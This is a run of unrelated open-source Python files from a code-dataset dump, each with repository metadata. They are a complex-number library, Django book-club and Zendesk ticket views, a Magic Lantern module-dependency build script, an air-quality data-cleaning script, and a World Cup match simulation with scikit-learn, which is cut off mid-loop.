            pdc.update(method=na)
            pda.append(pdc)
        return pd.DataFrame(pda)
    def _get_accuracy(self):
        """Return accuracy/precision/sensitivity details for segment hits."""
        aa = Accuracy()
        aa.set_data(self.root, self.name, aa.PreprocessSegmentHitRatio)
        req = ["accuracy", "precision", "sensitivity"]
        return aa.details(req, show=0)
    def _get_batch_delays(self, keys=[]):
        """Collect per-key slide frames as [{key, df}, ...] dicts."""
        # NOTE(review): mutable default ``keys=[]`` is a smell but is only
        # iterated (never mutated) here, so it is harmless in practice.
        self._reload_obj("reducer")
        dis = []
        for ri, na, rk, dof in self.re_.zipkey(keys):
            df = self._get_reduced_slides(rk, dof)
            dis.append(dict(key=na, df=df))
        return dis
74287985616 | import math
def sumacomplex(c1,c2):
    """Return the sum of two complex numbers given as (real, imag) tuples."""
    re1, im1 = c1
    re2, im2 = c2
    return (re1 + re2, im1 + im2)
def multcomplex(c1,c2):
    """Return the product of two complex numbers given as (real, imag) tuples.

    Uses (a + bi)(c + di) = (ac - bd) + (ad + bc)i.
    """
    a, b = c1
    c, d = c2
    return (a * c - b * d, a * d + b * c)
def restacomplex(c1,c2):
    """Return the difference c1 - c2 of two (real, imag) tuples."""
    re1, im1 = c1
    re2, im2 = c2
    return (re1 - re2, im1 - im2)
def divcomplex(c1,c2):
    """Return c1 / c2 as an unreduced fraction triple.

    Multiplies numerator and denominator by the conjugate of c2 and
    returns (numerator_real, numerator_imag, denominator), where
    denominator = |c2|^2.
    """
    a, b = c1
    c, d = c2
    numerator_real = a * c + b * d
    numerator_imag = b * c - a * d
    denominator = c * c + d * d
    return (numerator_real, numerator_imag, denominator)
def modulocomplex(c):
    """Return the modulus |c| rounded to 6 decimal places."""
    magnitude = (c[0] ** 2 + c[1] ** 2) ** 0.5
    return round(magnitude, 6)
def conjugadocomplex(c):
    """Return the complex conjugate of c (imaginary part negated)."""
    real, imag = c
    return (real, -imag)
def fasecomplex(c):
    """Return the phase (argument) of c in degrees, rounded to 6 decimals.

    Uses a quadrant-corrected arctangent for nonzero real parts.  On the
    imaginary axis it returns the fixed values 0, 90 or 270 — note the
    negative imaginary axis maps to 270 rather than -90; this asymmetric
    convention is kept for backward compatibility.
    """
    real, imag = c
    if real == 0:
        if imag > 0:
            return 90
        if imag < 0:
            return 270
        return 0
    angle = math.degrees(math.atan(imag / real))
    # atan only covers (-90, 90); shift results from the left half-plane.
    if real < 0 and imag > 0:
        angle += 180
    elif real < 0 and imag < 0:
        angle -= 180
    return round(angle, 6)
def polarcomplex(c):
    """Return c in polar form as a (modulus, phase_degrees) tuple."""
    return (modulocomplex(c), fasecomplex(c))
def printpolarcomplex(modu,fase):
    """Print a polar-form value as 'modulus (phase°)'."""
    text = f'{modu} ({fase}°)'
    print(text)
def printcomplex(c):
    """Print a rectangular complex tuple as 'a + bi'."""
    real, imag = c
    print("{} + {}i".format(real, imag))
def printdivcomplex(c):
    """Print a division triple (num_re, num_im, den) as two fractions."""
    num_re, num_im, den = c
    print(f"({num_re} / {den}) + ({num_im} / {den}) i")
# Demo/smoke test of the library when run as a script.
if __name__ == '__main__':
    printcomplex((7,-4))
    printcomplex(sumacomplex((3,-8),(4,6)))
    printcomplex(multcomplex((2,-3),(-1,1)))
    printcomplex(restacomplex((1,-1),(-2,-5)))
    print(modulocomplex((-2,-3)))
    printdivcomplex(divcomplex((3,2),(-1,2)))
    print(conjugadocomplex((7,-4)))
    fase=fasecomplex((7,-4))
    print(f'{fase}°')
print(polarcomplex((7,-4))) | Cristian5124/LibComplex | Libcomplex.py | Libcomplex.py | py | 1,916 | python | en | code | 1 | github-code | 13 |
7117420029 | """Adapted from clucker project"""
"""Post creation views."""
from django.contrib.auth.mixins import LoginRequiredMixin
from django.shortcuts import redirect, render
from django.views.generic.edit import CreateView
from django.urls import reverse
from bookclub.forms import UserPostForm
from bookclub.models import UserPost, Club, User
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin
from django.views.generic.edit import View
from django.core.paginator import Paginator
from django.conf import settings
class UserNewPostView(LoginRequiredMixin, CreateView):
    """Class-based generic view for new post handling (POST only)."""
    model = UserPost
    template_name = 'user_feed.html'
    form_class = UserPostForm
    # Only accept POST; the form is displayed by another view.
    http_method_names = ['post']
    context_object_name = 'user'
    pk_url_kwarg = 'user_id'
    def get_context_data(self, **kwargs):
        """Return context data, including the new-post form and the
        target user's existing posts."""
        user_id = self.kwargs['user_id']
        user = User.objects.get(id=user_id)
        user_posts = UserPost.objects.filter(author = user)
        context = super().get_context_data(**kwargs)
        context['user'] = user_id
        context['form'] = UserPostForm()
        context['posts'] = user_posts
        return context
    def form_valid(self, form, **kwargs):
        """Process a valid form: attach the URL user as the post author."""
        user_id = self.kwargs['user_id']
        user = User.objects.get(id=user_id)
        form.instance.author = user
        return super().form_valid(form)
    def get_success_url(self, **kwargs):
        """Return URL to redirect the user to after valid form handling."""
        messages.add_message(self.request, messages.SUCCESS, "The post was sent!")
        # NOTE(review): this local is unused — presumably leftover.
        user = self.kwargs['user_id']
        return reverse('profile')
    def handle_no_permission(self):
        # Unauthenticated users are sent to the login page.
        return redirect('login')
def get_all_follow_posts(request):
    """Return all posts by users the requester follows, newest first."""
    all_follow_posts = []
    current_user = request.user
    for follow in current_user.followees.all():
        # NOTE(review): list(set(...)) deduplicates but discards queryset
        # order; order is restored by the sort below, so this is only
        # meaningful if the queryset could contain duplicates — confirm.
        user_posts = list(set(UserPost.objects.filter(author=follow)))
        if user_posts:
            for post in user_posts:
                all_follow_posts.append(post)
    # Newest posts first.
    all_follow_posts.sort(key=lambda p: p.created_at, reverse=True)
    return all_follow_posts
class UserPostsView(LoginRequiredMixin, View):
    """View that handles user posts."""
    def get(self, request):
        """Display user post template"""
        return self.render()
    def render(self):
        """Render the followed users' posts, paginated."""
        # NOTE(review): this local is unused — presumably leftover.
        current_user = self.request.user
        # NOTE(review): stray string literal below is not a docstring (it is
        # not the first statement); kept as-is.
        """Render all user posts"""
        user_posts = get_all_follow_posts(self.request)
        paginator = Paginator(user_posts, settings.POSTS_PER_PAGE)
        page_number = self.request.GET.get('page')
        page_obj = paginator.get_page(page_number)
        return render(self.request, 'user_posts.html', {'user_posts': user_posts, 'page_obj': page_obj})
| EmmaSConteh/Ctrl_Intelligence | bookclub/views/user_post_views.py | user_post_views.py | py | 2,906 | python | en | code | 0 | github-code | 13 |
6709691245 | from django.shortcuts import render
from ticket.Zenpy import zenpy_client
from django.shortcuts import redirect
from user.forms import CreateTicket
from zenpy.lib.api_objects import Ticket, User,CustomField
from django.contrib import messages
# CREATE
def create_ticket(request):
    """Create a Zendesk ticket from the submitted support form.

    On success redirects to the user homepage; any other path (GET,
    invalid form) falls through to the login redirect.
    """
    form = CreateTicket(request.POST)
    if request.method == "POST":
        if form.is_valid():
            # NOTE(review): debug print — presumably leftover.
            print('valid')
            Email = form.cleaned_data['email']
            Phone = form.cleaned_data['Phone_Number']
            Description = form.cleaned_data['description']
            Subject = form.cleaned_data['subject']
            Priority = form.cleaned_data['priority']
            # NOTE(review): stray string literal below is not a docstring;
            # kept as-is.
            """
            Zendesk create ticket API call .."""
            # Custom field ids are Zendesk-instance specific (email/phone).
            zenpy_client.tickets.create(
                Ticket(description=Description,subject=Subject,priority=Priority,custom_fields=[CustomField(id=6946196446109, value=Email),CustomField(id=6946196963741, value=Phone)],
                requester=User(name=request.user.name, email=request.user.email)))
            messages.success(request,"Ticket Submitted Successfuly")
            return redirect('user_homepage')
    return redirect('login')
# DELETE
def delete_ticket(request, id):
    """Delete the Zendesk ticket whose id matches *id*.

    Admins are redirected to the full ticket list, regular users to
    their own tickets. *id* shadows the builtin but is kept because the
    URL conf passes it by keyword.

    Fix: stop scanning once the matching ticket has been deleted; the
    original kept iterating (and re-comparing) every remaining ticket.
    """
    for ticket in zenpy_client.tickets():
        if ticket.id == id:
            zenpy_client.tickets.delete(ticket)
            break  # ids are unique; no need to look further
    if request.user.is_admin:
        return redirect('list')
    return redirect('tickets')
# VIEW
def lists(request):
    """Render every Zendesk ticket, as a dict, in the 'list.html' template."""
    ticket_dicts = [ticket.to_dict() for ticket in zenpy_client.tickets()]
    return render(request, 'list.html', {'p': ticket_dicts})
| nikhilmp448/PeerXP-AcmeSupport | ticket/views.py | views.py | py | 1,775 | python | en | code | 0 | github-code | 13 |
39636259644 | #!/usr/bin/env python3
import os
import sys
import shutil
import argparse
import glob
def main():
    """Entry point: parse CLI arguments, then copy all eligible modules."""
    parsed = parse_args()
    copy_good_modules(parsed.module_names, parsed.cam_dir, parsed.dest_dir)
def parse_args():
    """Parse and validate CLI arguments.

    Validates the destination path, derives the camera directory from it,
    and attaches the resolved relative cam dir to the returned namespace
    as ``cam_dir``. Exits with a distinct status code on each failure
    (0 is used for the benign "no symbol file" case of minimal builds).
    """
    description = """Given a directory path, and a list of module names,
copies each module into the dir, if the cam being built has the symbols needed
for the module to run. That is: put the right modules into the cam build.
Used during the build to copy the correct modules into a zip.
"""
    parser = argparse.ArgumentParser(description=description)
    parser.add_argument("dest_dir",
                        help="path to copy modules into, e.g. "
                             "platform/200D.101/zip/ML/modules")
    parser.add_argument("module_names",
                        nargs="*",
                        help="e.g. adv_int edmac")
    args = parser.parse_args()

    if not args.module_names:
        print("No module names given")
        sys.exit(1)

    dest_dir = args.dest_dir
    if not os.path.isdir(dest_dir):
        print("dest_dir didn't exist or wasn't a dir: '%s'"
              % dest_dir)
        sys.exit(2)

    # Builds are expected to target a path of the shape
    # <full path>/platform/<cam>.<fw>/zip/ML/modules
    parts = dest_dir.split(os.path.sep)
    if "platform" not in parts:
        print("dest_dir didn't contain 'platform' dir: '%s'" % dest_dir)
        sys.exit(3)

    cam_dir_name = parts[parts.index("platform") + 1]
    if len(cam_dir_name.split(".")) != 2:
        # Cam dirs look like "200D.101": a dot separates cam from FW version.
        # Not a great test but it works at present.
        print("cam dir looked weird: '%s'" % cam_dir_name)
        sys.exit(4)

    cam_dir = os.path.join(dest_dir, "..", "..", "..")
    if "magiclantern.sym" not in os.listdir(cam_dir):
        # Happens for ML_SRC_PROFILE = minimal builds: nothing to copy,
        # so exit successfully rather than failing the build.
        print("No magiclantern.sym in cam dir, can't include modules: '%s'"
              % dest_dir)
        sys.exit(0)

    args.cam_dir = os.path.relpath(cam_dir)
    return args
def copy_good_modules(module_names, cam_dir, dest_dir):
    """Copy into dest_dir every named module whose symbol dependencies
    can be satisfied by the cam's exported symbols (magiclantern.sym)
    plus symbols exported by the other modules being copied.

    Fails the build (exit 6) if the two-pass solver leaves any module
    with unsatisfied-but-satisfiable dependencies.
    """
    modules = {Module(m) for m in module_names}
    # ML's exported symbols for this cam; one "0xADDR name" pair per line.
    with open(os.path.join(cam_dir, "magiclantern.sym"), "r") as f:
        available_syms = {s.strip().split()[1] for s in f}
    all_syms = available_syms.copy()
    for m in modules:
        all_syms.update(m.syms)
    # Rule out modules that require symbols nothing (cam or any module)
    # could ever provide.
    cannot_sat_m = {m for m in modules if m.deps - all_syms}
    can_sat_m = modules - cannot_sat_m
    for m in cannot_sat_m:
        m.unsatisfied_deps = m.deps - all_syms
    # Resolve dependencies starting from the ML exports only.  Whenever a
    # module's deps are fully satisfied, its own exports join the pool,
    # because that module will be shipped.
    #
    # Two passes are used because sets are unordered and module dependency
    # chains are assumed to be at most one level deep; two passes guarantee
    # all one-deep deps are found.  A dependency graph would be the more
    # sophisticated approach.
    max_passes = 2
    while max_passes:
        for m in can_sat_m:
            if m.unsatisfied_deps:
                if m.deps.issubset(available_syms):
                    # NOTE: {} is an empty dict, not a set; harmless here
                    # because only truthiness of unsatisfied_deps is used.
                    m.unsatisfied_deps = {}
                    available_syms.update(m.syms)
                else:
                    m.unsatisfied_deps = m.deps - available_syms
        max_passes -= 1
    unsat_m = {m for m in can_sat_m if m.unsatisfied_deps}
    sat_m = can_sat_m - unsat_m
    print("These modules cannot be included (not possible to meet listed deps):")
    for m in cannot_sat_m:
        print("%s " % m.name)
        for d in m.unsatisfied_deps:
            print("\t%s" % d)
    print("\nThese modules will not be included (deps not solved):")
    for m in unsat_m:
        print("%s " % m.name)
        for d in m.unsatisfied_deps:
            print("\t%s" % d)
    print("\nThese modules will be included (deps met):")
    for m in sat_m:
        print("%s " % m.name)
    # Copy the satisfied modules into the build output dir.
    for m in sat_m:
        shutil.copy(m.mo_file, dest_dir)
    if unsat_m:
        # The solver being inadequate means (for example) a module has a
        # deeper dependency chain than previously existed.  Break the
        # build so someone fixes this.
        print("Failing build due to unsolved module dependencies")
        sys.exit(6)
class ModuleError(Exception):
    """Error raised during module processing (currently unused in this script)."""
class Module:
    """A buildable ML module: its .mo binary plus its dependency (.dep)
    and exported-symbol (.sym) side files.

    Expected to be constructed from the modules dir, where *name* is a
    subdirectory containing:
        modules/<name>/<name>.mo
        modules/<name>/<name>.dep
        modules/<name>/<name>.sym
    """
    def __init__(self, name):
        self.mo_file = os.path.join(name, name + ".mo")
        self.dep_file = os.path.join(name, name + ".dep")
        self.sym_file = os.path.join(name, name + ".sym")
        self.name = name
        # Required symbols, one name per line.
        with open(self.dep_file, "r") as f:
            self.deps = {d.rstrip() for d in f}
        # NOTE: this aliases the same set object as self.deps; the solver
        # later rebinds unsatisfied_deps rather than mutating it.
        self.unsatisfied_deps = self.deps
        # Exported symbols (often empty); lines look like "0x1f0120 some_name".
        with open(self.sym_file, "r") as f:
            self.syms = {s.strip().split()[1] for s in f}
    def __str__(self):
        """Human-readable dump: name, .mo path, unsatisfied deps, exports."""
        s = "Module: %s\n" % self.name
        s += "\t%s\n" % self.mo_file
        s += "\tUnsat deps:\n"
        for d in self.unsatisfied_deps:
            s += "\t\t%s\n" % d
        s += "\tSyms:\n"
        for sym in self.syms:
            s += "\t\t%s\n" % sym
        return s
# Script entry point (the file is also importable without side effects).
if __name__ == "__main__":
    main()
| reticulatedpines/magiclantern_simplified | modules/copy_modules_with_satisfied_deps.py | copy_modules_with_satisfied_deps.py | py | 6,277 | python | en | code | 105 | github-code | 13 |
2401462663 | import pandas as pd
import os
from datetime import datetime
# Path to the raw data set, expected one level above the working directory.
csv_data = os.path.join(os.getcwd(), '../bristol-air-quality-data.csv')
print(csv_data)
# The export is semicolon-separated; drop rows that are entirely empty.
df = pd.read_csv(csv_data, sep = ';')
df = df.dropna(how='all')
'''
DATAFRAME TRANSFORMATION AND CLEANING
'''
def data_cleaning(df):
    """Normalise dtypes and fill missing values in the air-quality frame.

    - 'Date Time' is parsed to a tz-naive datetime; missing values are
      filled with ``datetime.now()`` (kept for backward compatibility,
      although it makes the fill nondeterministic).
    - Numeric sensor columns: NaN -> 0.0.
    - 'SiteID': NaN -> 0;  'Current': NaN -> 'No Response'.
    - Descriptive string columns: NaN -> 'No records'.

    The frame is modified in place and also returned.  Fix: the numeric
    column list was previously duplicated three times inline, a
    maintenance hazard; it is now defined once.
    """
    numeric_cols = ['NOx', 'NO2', 'NO', 'PM10', 'NVPM10', 'VPM10', 'NVPM2.5',
                    'PM2.5', 'VPM2.5', 'CO', 'O3', 'SO2', 'Temperature', 'RH',
                    'Air Pressure']
    string_cols = ['Location', 'geo_point_2d', 'DateStart', 'DateEnd',
                   'Instrument Type']
    df['Date Time'] = pd.to_datetime(df['Date Time'])
    df['Date Time'] = df['Date Time'].dt.tz_localize(None)
    df[numeric_cols] = df[numeric_cols].fillna(0.0)
    # int-like site identifier
    df[['SiteID']] = df[['SiteID']].fillna(0)
    # status flag
    df[['Current']] = df[['Current']].fillna('No Response')
    df[['Date Time']] = df[['Date Time']].fillna(datetime.now())
    df[string_cols] = df[string_cols].fillna('No records')
    return df
# Run the cleaning pipeline (data_cleaning mutates df in place and returns it).
clean_df = data_cleaning(df)
def Nan_check(data_df):
    """Report whether *data_df* still contains any NaN values.

    Prints the per-column NaN counts and returns 'No more Nan values'
    when the frame is NaN-free, otherwise 'Nan still exist in the
    dataframe'.

    Fixes two defects: the original inspected the module-level ``df``
    instead of its argument, and it compared per-column NaN counts
    (max == min), which wrongly reported success whenever every column
    had the same non-zero number of NaNs.
    """
    nan_counts = data_df.isnull().sum()
    print(nan_counts.values)
    total_nans = int(nan_counts.sum())
    return 'No more Nan values' if total_nans == 0 else 'Nan still exist in the dataframe'
nan_status = Nan_check(clean_df)
print(nan_status)
'''
Generating the clean csv data
'''
# Only write the output when the cleaning pass removed every NaN.
if nan_status == 'No more Nan values':
    # NOTE(review): only the first three rows are written ([:3]) —
    # presumably a debugging leftover; confirm before relying on clean.csv.
    clean_df[:3].to_csv('clean.csv', index=False)
    data_quantity = len(clean_df)
    print('csv file generated successfully')
    print('Total quantity of clean records is {}'.format(data_quantity))
else:
    print('Unable to generate data due to some NAN in the data')
#print(clean_df.head(2))
| nathphoenix/Air_analysis | question1/clean.py | clean.py | py | 1,864 | python | en | code | 0 | github-code | 13 |
39177668541 | import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np # linear algebra
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.metrics import confusion_matrix, roc_curve, roc_auc_score
from collections.abc import Iterable
from operator import itemgetter
# With the feature database prepared, modelling can start.  Two models are
# tested — random forest and gradient boosting — and the better one is kept.
model_db = pd.read_csv("kaggle/model_db.csv")
# Columns 3+ are features; 'target' is the label.
X = model_db.iloc[:, 3:]
y = model_db[["target"]]
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size= 0.2, random_state=1)
# Gradient-boosting classifier with a grid search over its main knobs.
gb = GradientBoostingClassifier(random_state=5)
params = {"learning_rate": [0.01, 0.1, 0.5],
          "min_samples_split": [5, 10],
          "min_samples_leaf": [3, 5],
          "max_depth":[3,5,10],
          "max_features":["sqrt"],
          "n_estimators":[100, 200]
         }
gb_cv = GridSearchCV(gb, params, cv = 3, n_jobs = -1, verbose = False)
gb_cv.fit(X_train.values, np.ravel(y_train))
gb = gb_cv.best_estimator_
print(gb)
# Single-point "grid" for the random forest (hyperparameters pre-chosen).
params_rf = {"max_depth": [20],
             "min_samples_split": [10],
             "max_leaf_nodes": [175],
             "min_samples_leaf": [5],
             "n_estimators": [250],
             "max_features": ["sqrt"],
             }
# Random-forest classifier.
rf = RandomForestClassifier(random_state=1)
rf_cv = GridSearchCV(rf, params_rf, cv = 3, n_jobs = -1, verbose = False)
rf_cv.fit(X_train.values, np.ravel(y_train))
rf = rf_cv.best_estimator_
print(rf)
# Model analysis helpers.
def analyze(model):
    """Plot train/test ROC curves (AUCs in the title) and the test-set
    confusion matrix for *model*.

    Reads the module-level split X_train/X_test/y_train/y_test.
    """
    fpr, tpr, _ = roc_curve(y_test, model.predict_proba(X_test.values)[:, 1]) # test AUC
    plt.figure(figsize=(15, 10))
    plt.plot([0, 1], [0, 1], 'k--')
    plt.plot(fpr, tpr, label="test")
    fpr_train, tpr_train, _ = roc_curve(y_train, model.predict_proba(X_train.values)[:, 1]) # train AUC
    plt.plot(fpr_train, tpr_train, label="train")
    auc_test = roc_auc_score(y_test, model.predict_proba(X_test.values)[:, 1])
    auc_train = roc_auc_score(y_train, model.predict_proba(X_train.values)[:, 1])
    plt.legend()
    plt.title('AUC score is %.2f on test and %.2f on training' % (auc_test, auc_train))
    plt.show()
    plt.figure(figsize=(15, 10))
    cm = confusion_matrix(y_test, model.predict(X_test.values))
    sns.heatmap(cm, annot=True, fmt="d")
# The random-forest model is slightly better but appears to fit less well,
# so the gradient-boosting model is used for the simulation.
analyze(gb)
analyze(rf)
#开始比赛仿真
#第一件事是创造FIFA世界杯比赛。为了做到这一点,我将在维基百科上找到球队和小组赛。
# dfs = pd.read_html(r"https://en.wikipedia.org/wiki/2022_FIFA_World_Cup#Teams")
# for i in range(len(dfs)):
# df = dfs[i]
# cols = list(df.columns.values)
#
# if isinstance(cols[0], Iterable):
# if any("Tie-breaking criteria" in c for c in cols):
# start_pos = i + 1
#
# if any("Match 46" in c for c in cols):
# end_pos = i + 1
# matches = []
groups = ["A", "B", "C", "D", "E", "F", "G", "H"]
group_count = 7
#table = {}
# TABLE -> TEAM, POINTS, WIN PROBS (CRITERIO DE DESEMPATE)
#table[groups[group_count]] = [[a.split(" ")[0], 0, []] for a in list(dfs[start_pos].iloc[:, 1].values)]
table = {'A': [['Qatar', 0, []], ['Ecuador', 0, []], ['Senegal', 0, []], ['Netherlands', 0, []]],
'B': [['England', 0, []], ['Iran', 0, []], ['United States', 0, []], ['Wales', 0, []]],
'C': [['Argentina', 0, []], ['Saudi Arabia', 0, []], ['Mexico', 0, []], ['Poland', 0, []]],
'D': [['France', 0, []], ['Australia', 0, []], ['Denmark', 0, []], ['Tunisia', 0, []]],
'E': [['Spain', 0, []], ['Costa Rica', 0, []], ['Germany', 0, []], ['Japan', 0, []]],
'F': [['Belgium', 0, []], ['Canada', 0, []], ['Morocco', 0, []], ['Croatia', 0, []]],
'G': [['Brazil', 0, []], ['Serbia', 0, []], ['Switzerland', 0, []], ['Cameroon', 0, []]],
'H': [['Portugal', 0, []], ['Ghana', 0, []], ['Uruguay', 0, []], ['South Korea', 0, []]]}
#for i in range(start_pos + 1, end_pos, 1):
# for i in range(13, 67, 1):
# if len(dfs[i].columns) == 3:
# team_1 = dfs[i].columns.values[0]
# team_2 = dfs[i].columns.values[-1]
#
# matches.append((groups[group_count], team_1, team_2))
# else:
# group_count+=1
# table[groups[group_count]] = [[a, 0, []] for a in list(dfs[i].iloc[:, 1].values)]
matches = [('A', 'Qatar', 'Ecuador'),
('A', 'Senegal', 'Netherlands'),
('A', 'Qatar', 'Senegal'),
('A', 'Netherlands', 'Ecuador'),
('A', 'Ecuador', 'Senegal'),
('A', 'Netherlands', 'Qatar'),
('B', 'England', 'Iran'),
('B', 'United States', 'Wales'),
('B', 'Wales', 'Iran'),
('B', 'England', 'United States'),
('B', 'Wales', 'England'),
('B', 'Iran', 'United States'),
('C', 'Argentina', 'Saudi Arabia'),
('C', 'Mexico', 'Poland'),
('C', 'Poland', 'Saudi Arabia'),
('C', 'Argentina', 'Mexico'),
('C', 'Poland', 'Argentina'),
('C', 'Saudi Arabia', 'Mexico'),
('D', 'Denmark', 'Tunisia'),
('D', 'France', 'Australia'),
('D', 'Tunisia', 'Australia'),
('D', 'France', 'Denmark'),
('D', 'Australia', 'Denmark'),
('D', 'Tunisia', 'France'),
('E', 'Germany', 'Japan'),
('E', 'Spain', 'Costa Rica'),
('E', 'Japan', 'Costa Rica'),
('E', 'Spain', 'Germany'),
('E', 'Japan', 'Spain'),
('E', 'Costa Rica', 'Germany'),
('F', 'Morocco', 'Croatia'),
('F', 'Belgium', 'Canada'),
('F', 'Belgium', 'Morocco'),
('F', 'Croatia', 'Canada'),
('F', 'Croatia', 'Belgium'),
('F', 'Canada', 'Morocco'),
('G', 'Switzerland', 'Cameroon'),
('G', 'Brazil', 'Serbia'),
('G', 'Cameroon', 'Serbia'),
('G', 'Brazil', 'Switzerland'),
('G', 'Serbia', 'Switzerland'),
('G', 'Cameroon', 'Brazil'),
('H', 'Uruguay', 'South Korea'),
('H', 'Portugal', 'Ghana'),
('H', 'South Korea', 'Ghana'),
('H', 'Portugal', 'Uruguay'),
('H', 'Ghana', 'Uruguay'),
('H', 'South Korea', 'Portugal')]
print(table)
# Tie-breaker when teams finish level on points: the mean of each team's
# accumulated per-game win probabilities (stored in slot 2 of each table row).
print(matches[:10])
# Each team's model inputs are the statistics from its games played to date,
# taken from the historical stats frame loaded here.
team_stats_raw = pd.read_csv("kaggle/team_stats_raw.csv")
def find_stats(team_1):
    """Return the 9-element stat vector for team *team_1*:

    [latest rank,
     mean goals scored (all games), mean goals scored (last 5),
     mean goals conceded (all), mean goals conceded (last 5),
     mean opponent rank (all), mean opponent rank (last 5),
     mean points-by-rank (all), mean points-by-rank (last 5)]

    Reads the module-level ``team_stats_raw`` frame.
    """
    past_games = team_stats_raw[(team_stats_raw["team"] == team_1)].sort_values("date")
    last5 = team_stats_raw[(team_stats_raw["team"] == team_1)].sort_values("date").tail(5)
    team_1_rank = past_games["rank"].values[-1]
    team_1_goals = past_games.score.mean()
    team_1_goals_l5 = last5.score.mean()
    team_1_goals_suf = past_games.suf_score.mean()
    team_1_goals_suf_l5 = last5.suf_score.mean()
    team_1_rank_suf = past_games.rank_suf.mean()
    team_1_rank_suf_l5 = last5.rank_suf.mean()
    team_1_gp_rank = past_games.points_by_rank.mean()
    team_1_gp_rank_l5 = last5.points_by_rank.mean()
    return [team_1_rank, team_1_goals, team_1_goals_l5, team_1_goals_suf, team_1_goals_suf_l5, team_1_rank_suf, team_1_rank_suf_l5, team_1_gp_rank, team_1_gp_rank_l5]
def find_features(team_1, team_2):
    """Build the 12-feature difference vector the classifier expects.

    *team_1* and *team_2* are the 9-element stat lists produced by
    ``find_stats``: [rank, goals, goals_l5, goals_suf, goals_suf_l5,
    rank_suf, rank_suf_l5, gp_rank, gp_rank_l5].  The trailing (1, 0)
    pair matches the constant flags used at training time.
    """
    (rank_1, goals_1, goals_l5_1, suf_1, suf_l5_1,
     rank_suf_1, rank_suf_l5_1, gp_1, gp_l5_1) = team_1
    (rank_2, goals_2, goals_l5_2, suf_2, suf_l5_2,
     rank_suf_2, rank_suf_l5_2, gp_2, gp_l5_2) = team_2
    return [
        rank_1 - rank_2,                                    # rank_dif
        goals_1 - goals_2,                                  # goals_dif
        goals_l5_1 - goals_l5_2,                            # goals_dif_l5
        suf_1 - suf_2,                                      # goals_suf_dif
        suf_l5_1 - suf_l5_2,                                # goals_suf_dif_l5
        (goals_1 / rank_suf_1) - (goals_2 / rank_suf_2),    # goals_per_ranking_dif
        rank_suf_1 - rank_suf_2,                            # dif_rank_agst
        rank_suf_l5_1 - rank_suf_l5_2,                      # dif_rank_agst_l5
        gp_1 - gp_2,                                        # dif_gp_rank
        gp_l5_1 - gp_l5_2,                                  # dif_gp_rank_l5
        1,
        0,
    ]
# Run the group-stage simulation.
# The model predicts whether team 1 wins, so a draw criterion is needed; with
# no home advantage at a World Cup, each game is predicted twice with the teams
# swapped.  The team with the higher mean probability is the winner; if the two
# orderings disagree on the winner, the game is recorded as a draw (1 point
# each); a win is worth 3 points.
advanced_group = []
last_group = ""
# Reset points (slot 1) and per-game probabilities (slot 2) for every team.
for k in table.keys():
    for t in table[k]:
        t[1] = 0
        t[2] = []
for teams in matches:
    draw = False
    team_1 = find_stats(teams[1])
    team_2 = find_stats(teams[2])
    features_g1 = find_features(team_1, team_2)
    features_g2 = find_features(team_2, team_1)
    probs_g1 = gb.predict_proba([features_g1])
    probs_g2 = gb.predict_proba([features_g2])
    team_1_prob_g1 = probs_g1[0][0]
    team_1_prob_g2 = probs_g2[0][1]
    team_2_prob_g1 = probs_g1[0][1]
    team_2_prob_g2 = probs_g2[0][0]
    team_1_prob = (probs_g1[0][0] + probs_g2[0][1]) / 2
    team_2_prob = (probs_g2[0][0] + probs_g1[0][1]) / 2
    # Draw: the two orderings name different winners.
    if ((team_1_prob_g1 > team_2_prob_g1) & (team_2_prob_g2 > team_1_prob_g2)) | (
            (team_1_prob_g1 < team_2_prob_g1) & (team_2_prob_g2 < team_1_prob_g2)):
        draw = True
        for i in table[teams[0]]:
            if i[0] == teams[1] or i[0] == teams[2]:
                i[1] += 1
    elif team_1_prob > team_2_prob:
        winner = teams[1]
        winner_proba = team_1_prob
        for i in table[teams[0]]:
            if i[0] == teams[1]:
                i[1] += 3
    elif team_2_prob > team_1_prob:
        winner = teams[2]
        winner_proba = team_2_prob
        for i in table[teams[0]]:
            if i[0] == teams[2]:
                i[1] += 3
    for i in table[teams[0]]:  # accumulate the tie-breaker (per-game win probs)
        if i[0] == teams[1]:
            i[2].append(team_1_prob)
        if i[0] == teams[2]:
            i[2].append(team_2_prob)
    # On entering a new group, finalise and print the previous group's table.
    if last_group != teams[0]:
        if last_group != "":
            print("\n")
            print("Group %s advanced: " % (last_group))
            for i in table[last_group]:  # collapse the tie-breaker to its mean
                i[2] = np.mean(i[2])
            final_points = table[last_group]
            final_table = sorted(final_points, key=itemgetter(1, 2), reverse=True)
            advanced_group.append([final_table[0][0], final_table[1][0]])
            for i in final_table:
                print("%s -------- %d" % (i[0], i[1]))
        print("\n")
        print("-" * 10 + " Starting Analysis for Group %s " % (teams[0]) + "-" * 10)
    if draw == False:
        print("Group %s - %s vs. %s: Winner %s with %.2f probability" % (
            teams[0], teams[1], teams[2], winner, winner_proba))
    else:
        print("Group %s - %s vs. %s: Draw" % (teams[0], teams[1], teams[2]))
    last_group = teams[0]
# Finalise the last group (the loop above only closes a group when the next
# one starts).
print("\n")
print("Group %s advanced: " % (last_group))
for i in table[last_group]:  # collapse the tie-breaker to its mean
    i[2] = np.mean(i[2])
final_points = table[last_group]
final_table = sorted(final_points, key=itemgetter(1, 2), reverse=True)
advanced_group.append([final_table[0][0], final_table[1][0]])
for i in final_table:
    print("%s -------- %d" % (i[0], i[1]))
# Knockout-phase simulation: the Round of 16 bracket pairs group winners with
# runners-up of the neighbouring group; each later round pairs consecutive
# winners of the previous one.  Each tie is predicted with the same
# swap-and-average scheme as above, but with no draws — the higher mean
# probability advances.
advanced = advanced_group
playoffs = {"Round of 16": [], "Quarter-Final": [], "Semi-Final": [], "Final": []}
for p in playoffs.keys():
    playoffs[p] = []
actual_round = ""
next_rounds = []
for p in playoffs.keys():
    if p == "Round of 16":
        # Build the bracket: first pass takes group winners, second pass
        # (offset by len(advanced)) takes the runners-up, alternating so that
        # winner of one group meets runner-up of the paired group.
        control = []
        for a in range(0, len(advanced * 2), 1):
            if a < len(advanced):
                if a % 2 == 0:
                    control.append((advanced * 2)[a][0])
                else:
                    control.append((advanced * 2)[a][1])
            else:
                if a % 2 == 0:
                    control.append((advanced * 2)[a][1])
                else:
                    control.append((advanced * 2)[a][0])
